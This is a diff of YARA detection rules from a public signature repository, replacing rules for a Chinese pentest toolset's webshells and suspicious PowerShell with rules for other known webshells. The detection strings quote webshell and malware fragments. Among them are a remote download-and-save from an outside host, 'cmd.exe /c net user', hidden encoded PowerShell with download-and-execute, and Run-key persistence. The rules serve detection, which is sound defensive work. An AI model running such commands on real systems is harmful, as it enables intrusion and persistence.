-		$s3 = "Userpwd = \"admin\"   'User Password" fullword ascii
+		$s7 = "$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>LINK</t"
 
 	condition:
-		filesize < 10KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_FTP_MYSQL_MSSQL_SSH : FILE
+rule SIGNATURE_BASE_Webshell_Asp_Ajan
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file FTP MYSQL MSSQL SSH.txt"
+		description = "Web Shell - file Ajan.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dd619901-6f0e-527e-9926-808176641c09"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1011-L1029"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2057-L2070"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "fe63b215473584564ef2e08651c77f764999e8ac"
-		logic_hash = "a66884c71ce0cce05ba6607bf66dc55bfae5393746328c06f5c9ca98005d0caf"
+		hash = "b6f468252407efc2318639da22b08af0"
+		logic_hash = "1817786725de61150f1b3ff57597c780323a7f4df1c046cfd473e1918decd7d2"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$_SESSION['hostlist'] = $hostlist = $_POST['hostlist'];" fullword ascii
-		$s2 = "Codz by <a href=\"http://www.sablog.net/blog\">4ngel</a><br />" fullword ascii
-		$s3 = "if ($conn_id = @ftp_connect($host, $ftpport)) {" fullword ascii
-		$s4 = "$_SESSION['sshport'] = $mssqlport = $_POST['sshport'];" fullword ascii
-		$s5 = "<title>ScanPass(FTP/MYSQL/MSSQL/SSH) by 4ngel</title>" fullword ascii
+		$s3 = "entrika.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreate"
 
 	condition:
-		filesize < 20KB and 3 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Shell : FILE
+rule SIGNATURE_BASE_Webshell_Config_Myxx_Zend
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file shell.txt"
+		description = "Web Shell - from files config.jsp, myxx.jsp, zend.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fdfc3fc1-9400-533b-978b-1a1fac112e1f"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1031-L1047"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2071-L2087"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b7b34215c2293ace70fc06cbb9ce73743e867289"
-		logic_hash = "be3961d6568acfaadfa09efda2f914259a59f4e30725c7d434e89f6020e40515"
+		logic_hash = "161dc712f279e73ea8cab4b0298cc2ca3799c6d9107050c4231a81021caed37f"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash1 = "e0354099bee243702eb11df8d0e046df"
+		hash2 = "591ca89a25f06cf01e4345f98a22845c"
 
 	strings:
-		$s1 = "xPost.Open \"GET\",\"http://www.i0day.com/1.txt\",False //" fullword ascii
-		$s2 = "sGet.SaveToFile Server.MapPath(\"test.asp\"),2 //" fullword ascii
-		$s3 = "http://hi.baidu.com/xahacker/fuck.txt" fullword ascii
+		$s3 = ".println(\"<a href=\\\"javascript:alert('You Are In File Now ! Can Not Pack !');"
 
 	condition:
-		filesize < 1KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php7 : FILE
+rule SIGNATURE_BASE_Webshell_Browser_201_3_Ma_Download
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php7.txt"
+		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f21bb0db-d18a-58c0-a227-5baf5536c57b"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1049-L1064"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2088-L2107"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "05a3f93dbb6c3705fd5151b6ffb64b53bc555575"
-		logic_hash = "70804d914c6f31422632943bf663f997eb747a290a13b27bfcc66bc3129f136d"
+		logic_hash = "3605e1304fb314c13d6c94d6ac9337731c6ee4fef679444d599cb3ae29023b56"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
+		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
+		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
+		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
+		hash4 = "fa87bbd7201021c1aefee6fcc5b8e25a"
 
 	strings:
-		$s0 = "---> '.$ports[$i].'<br>'; ob_flush(); flush(); } } echo '</div>'; return true; }" ascii
-		$s1 = "$getfile = isset($_POST['downfile']) ? $_POST['downfile'] : ''; $getaction = iss" ascii
+		$s2 = "<small>jsp File Browser version <%= VERSION_NR%> by <a"
+		$s3 = "else if (fName.endsWith(\".mpg\") || fName.endsWith(\".mpeg\") || fName.endsWith"
 
 	condition:
-		filesize < 300KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Rootkit : FILE
+rule SIGNATURE_BASE_Webshell_Itsec_Itsecteam_Shell_Jhn
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file rootkit.txt"
+		description = "Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ab51abca-0790-541c-9f18-1568809ef113"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1066-L1081"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2108-L2125"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3bfc1c95782e702cf56184e7d438edcf5802eab3"
-		logic_hash = "5569a179f011ece9802676542d5556fe8d2a2b144e26065b9e0c5bd06c970201"
+		logic_hash = "2775d7e47a26e06ea716bdca32a0f768eccf4d269caa3d107b4a78f8684ce741"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
+		hash1 = "bd6d3b2763c705a01cc2b3f105a25fa4"
+		hash2 = "40c6ecf77253e805ace85f119fe1cebb"
 
 	strings:
-		$s0 = "set ss=zsckm.get(\"Win32_ProcessSta\"&uyy&\"rtup\")" fullword ascii
-		$s1 = "If jzgm=\"\"Then jzgm=\"cmd.exe /c net user\"" fullword ascii
+		$s4 = "echo $head.\"<font face='Tahoma' size='2'>Operating System : \".php_uname().\"<b"
+		$s5 = "echo \"<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'"
 
 	condition:
-		filesize < 80KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Jspshell : FILE
+rule SIGNATURE_BASE_Webshell_Ghost_Source_Icesword_Silic
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file jspshell.txt"
+		description = "Web Shell - from files ghost_source.php, icesword.php, silic.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ff72f94b-1c0a-5615-b35f-35f69c920292"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1083-L1098"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2126-L2143"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d16af622f7688d4e0856a2678c4064d3d120e14b"
-		logic_hash = "9b952f941eb87d7a1b4f747f4e0b0b5ee8876190c6f684b811057a2c78044047"
+		logic_hash = "22879d5279866e3c25a5b41a98b44595f191cfcac6489208b0bdb6b7ca7201e5"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "cbf64a56306c1b5d98898468fc1fdbd8"
+		hash1 = "6e20b41c040efb453d57780025a292ae"
+		hash2 = "437d30c94f8eef92dc2f064de4998695"
 
 	strings:
-		$s1 = "else if(Z.equals(\"M\")){String[] c={z1.substring(2),z1.substring(0,2),z2};Proce" ascii
-		$s2 = "String Z=EC(request.getParameter(Pwd)+\"\",cs);String z1=EC(request.getParameter" ascii
+		$s3 = "if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $"
+		$s6 = "if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST["
 
 	condition:
-		filesize < 30KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_Serv_U : FILE
+rule SIGNATURE_BASE_Webshell_Jspspy_Jspspyjdk5_Jspspyjdk51_Luci_Jsp_Spy2009_M_Ma3_Xxx
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file serv-u.php"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "dd37b2c3-e06d-5245-97d7-40e5eeadb76f"
-		date = "2015-06-23"
-		modified = "2023-01-27"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1100-L1117"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2144-L2187"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "1c6415a247c08a63e3359b06575b36017befc0c0"
-		logic_hash = "89cfcbaa38c3b0b6c31af634b4588dcc8bc7a5aa3edac955a162173341d03622"
+		logic_hash = "6c61e5ccd4800f0cfd20532ab43f917f39a7367cc09cbe92e5320eb2c97fabf3"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash4 = "8b457934da3821ba58b06a113e0d53d9"
+		hash5 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash6 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash7 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash8 = "d71716df5042880ef84427acee8b121e"
+		hash9 = "341298482cf90febebb8616426080d1d"
+		hash10 = "29aebe333d6332f0ebc2258def94d57e"
+		hash11 = "42654af68e5d4ea217e6ece5389eb302"
+		hash12 = "88fc87e7c58249a398efd5ceae636073"
+		hash13 = "4a812678308475c64132a9b56254edbc"
+		hash14 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash15 = "344f9073576a066142b2023629539ebd"
+		hash16 = "32dea47d9c13f9000c4c807561341bee"
+		hash17 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash18 = "655722eaa6c646437c8ae93daac46ae0"
+		hash19 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash20 = "9c94637f76e68487fa33f7b0030dd932"
+		hash21 = "6acc82544be056580c3a1caaa4999956"
+		hash22 = "6aa32a6392840e161a018f3907a86968"
+		hash23 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash24 = "3ea688e3439a1f56b16694667938316d"
+		hash25 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash26 = "71097537a91fac6b01f46f66ee2d7749"
+		hash27 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash28 = "7a4b090619ecce6f7bd838fe5c58554b"
 
 	strings:
-		$s1 = "@readfile(\"c:\\\\winnt\\\\system32\\" ascii
-		$s2 = "$sendbuf = \"PASS \".$_POST[\"password\"].\"\\r\\n\";" fullword ascii
-		$s3 = "$cmd=\"cmd /c rundll32.exe $path,install $openPort $activeStr\";" fullword ascii
+		$s8 = "\"<form action=\\\"\"+SHELL_NAME+\"?o=upload\\\" method=\\\"POST\\\" enctype="
+		$s9 = "<option value='reg query \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\T"
 
 	condition:
-		filesize < 435KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Webshell : FILE
+rule SIGNATURE_BASE_Webshell_2_520_Job_Ma1_Ma4_2
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file WebShell.cgi"
+		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9fe4c8fd-3955-5405-add2-835e6f64e8f2"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1119-L1135"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2188-L2208"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7ef773df7a2f221468cc8f7683e1ace6b1e8139a"
-		logic_hash = "7d80390a86b1858d2cf4f2be56df7e734aea402de0878adf40ef36721719ca74"
+		logic_hash = "db76ff42079b20d9e5c40661d7b30206e6bffc828f55daa4dc210662068f8e27"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "56c005690da2558690c4aa305a31ad37"
+		hash3 = "532b93e02cddfbb548ce5938fe2f5559"
+		hash4 = "6e0fa491d620d4af4b67bae9162844ae"
+		hash5 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
 
 	strings:
-		$s1 = "$login = crypt($WebShell::Configuration::password, $salt);" fullword ascii
-		$s2 = "my $error = \"This command is not available in the restricted mode.\\n\";" fullword ascii
-		$s3 = "warn \"command: '$command'\\n\";" fullword ascii
+		$s4 = "_url = \"jdbc:microsoft:sqlserver://\" + dbServer + \":\" + dbPort + \";User=\" "
+		$s9 = "result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getR"
 
 	condition:
-		filesize < 30KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Tuoku_Script_Mssql_2 : FILE
+rule SIGNATURE_BASE_Webshell_000_403_807_A_C5_Config_Css_Dm_He1P_Jspspy_Jspspyjdk5_Jspspyjdk51_Luci_Jsp_Xxx
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file mssql.asp"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3f9706d6-7f6e-5120-945a-d5d928d79507"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1137-L1153"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2209-L2255"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ad55512afa109b205e4b1b7968a89df0cf781dc9"
-		logic_hash = "1d4b75eeeddda6e92b8ec38679d5e2b9d21abf2d2b467b91a066dcf628725f0a"
+		logic_hash = "cda47d7967b0f4b2a274ff2196d27d2e108b00917812093bbb3f033a8a1d1c3c"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
+		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
+		hash4 = "8b457934da3821ba58b06a113e0d53d9"
+		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
+		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
+		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash9 = "d71716df5042880ef84427acee8b121e"
+		hash10 = "341298482cf90febebb8616426080d1d"
+		hash11 = "29aebe333d6332f0ebc2258def94d57e"
+		hash12 = "42654af68e5d4ea217e6ece5389eb302"
+		hash13 = "88fc87e7c58249a398efd5ceae636073"
+		hash14 = "4a812678308475c64132a9b56254edbc"
+		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
+		hash16 = "e0354099bee243702eb11df8d0e046df"
+		hash17 = "344f9073576a066142b2023629539ebd"
+		hash18 = "32dea47d9c13f9000c4c807561341bee"
+		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash20 = "655722eaa6c646437c8ae93daac46ae0"
+		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash22 = "9c94637f76e68487fa33f7b0030dd932"
+		hash23 = "6acc82544be056580c3a1caaa4999956"
+		hash24 = "6aa32a6392840e161a018f3907a86968"
+		hash25 = "591ca89a25f06cf01e4345f98a22845c"
+		hash26 = "349ec229e3f8eda0f9eb918c74a8bf4c"
+		hash27 = "3ea688e3439a1f56b16694667938316d"
+		hash28 = "ab77e4d1006259d7cbc15884416ca88c"
+		hash29 = "71097537a91fac6b01f46f66ee2d7749"
+		hash30 = "2434a7a07cb47ce25b41d30bc291cacc"
+		hash31 = "7a4b090619ecce6f7bd838fe5c58554b"
 
 	strings:
-		$s1 = "sqlpass=request(\"sqlpass\")" fullword ascii
-		$s2 = "set file=fso.createtextfile(server.mappath(request(\"filename\")),8,true)" fullword ascii
-		$s3 = "<blockquote> ServerIP:&nbsp;&nbsp;&nbsp;" fullword ascii
+		$s0 = "ports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";" fullword
+		$s1 = "private static class VEditPropertyInvoker extends DefaultInvoker {" fullword
 
 	condition:
-		filesize < 3KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp1 : FILE
+rule SIGNATURE_BASE_Webshell_Wso2_5_1_Wso2_5_Wso2
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file asp1.txt"
+		description = "Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bf0b1f1e-cf7b-5afb-8e0a-bcfd70fc8887"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L1155-L1171"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2256-L2273"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "78b5889b363043ed8a60bed939744b4b19503552"
-		logic_hash = "3b454b1254d05b2208aee02e966c9c56a338dd3d33a2c6acc2c4df3208314055"
+		logic_hash = "f2dce52f1b8d2c33cd8478a468383a87f13712dc6e5c9050fea6ede4f0d24cc5"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "dbeecd555a2ef80615f0894027ad75dc"
+		hash1 = "7c8e5d31aad28eb1f0a9a53145551e05"
+		hash2 = "cbc44fb78220958f81b739b493024688"
 
 	strings:
-		$s1 = "SItEuRl=" ascii
-		$s2 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii
-		$s3 = "Server.ScriptTimeout=" ascii
+		$s7 = "$opt_charsets .= '<option value=\"'.$item.'\" '.($_POST['charset']==$item?'selec"
+		$s8 = ".'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode($f['na"
 
 	condition:
-		filesize < 200KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Worddoc_Powershell_Urldownloadtofile : FILE
+rule SIGNATURE_BASE_Webshell_000_403_C5_Querydong_Spyjsp2010_T00Ls
 {
 	meta:
-		description = "Detects Word Document with PowerShell URLDownloadToFile"
+		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f76c5f91-f67c-5754-b771-73383aba4d64"
-		date = "2017-02-23"
-		modified = "2024-04-03"
-		reference = "https://www.arbornetworks.com/blog/asert/additional-insights-shamoon2/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L10-L30"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2274-L2294"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e4ea4e6092011bccfc5132186b910075361f4f77f01ae00c51c486d77a996775"
-		score = 75
+		logic_hash = "6f507499304a7cf4d14a134a4c0781fed9a94c40fe3257a4168bacdf3910ffec"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 		super_rule = 1
-		hash1 = "33ee8a57e142e752a9c8960c4f38b5d3ff82bf17ec060e4114f5b15d22aa902e"
-		hash2 = "388b26e22f75a723ce69ad820b61dd8b75e260d3c61d74ff21d2073c56ea565d"
-		hash3 = "71e584e7e1fb3cf2689f549192fe3a82fd4cd8ee7c42c15d736ebad47b028087"
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "8b457934da3821ba58b06a113e0d53d9"
+		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash4 = "655722eaa6c646437c8ae93daac46ae0"
+		hash5 = "9c94637f76e68487fa33f7b0030dd932"
 
 	strings:
-		$w1 = "Microsoft Forms 2.0 CommandButton" fullword ascii
-		$w2 = "Microsoft Word 97-2003 Document" fullword ascii
-		$p1 = "powershell.exe" fullword ascii
-		$p2 = "URLDownloadToFile" fullword ascii
+		$s8 = "table.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbName+\"')"
+		$s9 = "\"<p><input type=\\\"hidden\\\" name=\\\"selectDb\\\" value=\\\"\"+selectDb+\""
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and 1 of ( $w* ) and all of ( $p* ) )
+		all of them
 }
-rule SIGNATURE_BASE_Suspicious_Powershell_Code_1 : FILE
+rule SIGNATURE_BASE_Webshell_404_Data_Suiyue
 {
 	meta:
-		description = "Detects suspicious PowerShell code"
+		description = "Web Shell - from files 404.jsp, data.jsp, suiyue.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ec3c3682-d2de-52b7-bb49-b021ddf7f8ac"
-		date = "2017-02-22"
-		modified = "2024-04-03"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powershell_susp.yar#L32-L50"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L2295-L2311"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0a254e0e4f0fdaa5907f5fe0b0c3d5226e2fdac4072349019abc2b2b11cbde30"
-		score = 60
-		quality = 58
-		tags = "FILE"
+		logic_hash = "7f4ab5dbd2a72574c5d188e14ae98e599359b2d662266fc4c3a39d3d4405c208"
+		score = 70
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "7066f4469c3ec20f4890535b5f299122"
+		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
+		hash2 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
 
 	strings:
-		$s1 = /$[a-z]=new-object net.webclient/ ascii
-		$s2 = /$[a-z].DownloadFile\("http:/ ascii
-		$s3 = /IEX $[a-zA-Z]{1,8}.downloadstring\(["']http/ ascii nocase
-		$s4 = "powershell.exe -w hidden -ep bypass -Enc" ascii
-		$s5 = "-w hidden -noni -nop -c \"iex(New-Object" ascii
-		$s6 = "powershell.exe reg add HKCU\\software\\microsoft\\windows\\currentversion\\run" nocase
+		$s3 = " sbCopy.append(\"<input type=button name=goback value=' \"+strBack[languageNo]+"
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Suspicious_Powershell_Webdownload_1 : HIGHVOL FILE
+rule SIGNATURE_BASE_Webshell_R57Shell_R57Shell127_Sniper_SA_Shell_Egy_Spider_Shell_V2_R57_Xxx
 {
 	meta:
-		description = "Detects suspicious PowerShell code that downloads from web sites"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a763fb82-c840-531b-b631-f282bf035020"
-		date = "2017-02-22"
